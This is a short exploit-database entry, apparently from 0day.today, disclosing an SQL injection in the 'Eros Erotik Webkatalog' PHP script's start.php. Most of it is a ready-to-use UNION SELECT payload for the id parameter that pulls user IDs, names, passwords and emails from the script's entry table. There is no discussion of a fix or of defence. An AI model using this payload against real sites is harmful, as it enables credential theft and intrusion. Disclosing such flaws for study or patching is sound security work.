id: 11267
date: 03/11/2010
title: Eros Erotik Webkatalog start.php (rubrik&id) SQL Injection Vulnerability
author: Easy Laster
cves: 

========================================================================
Eros Erotik Webkatalog start.php (rubrik&id) SQL Injection Vulnerability
========================================================================

----------------------------Information------------------------------------------------
+Name : Eros Erotik Webkatalog start.php (rubrik&id)SQL Injection
+Autor : Easy Laster
+Date   : 11.03.2010
+Script  : Eros Erotik Webkatalog
+Price : 07,13 euro
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/webkatalog/start.php?go=rubrik&id=
+Exploitable   : www.site.com/webkatalog/start.php?go=rubrik&id=-1+union+select+1,2,3,4,
5,6,7,8,9,concat(id,0x3a,vorname,0x3a,passwort,0x3,mail),11,12,13,14,15+from+php005_4_eintrag--
                                                                           ^^"table name"^^
-----------------------------------------------------------------------------------------



#  0day.today [2023-03-22]  #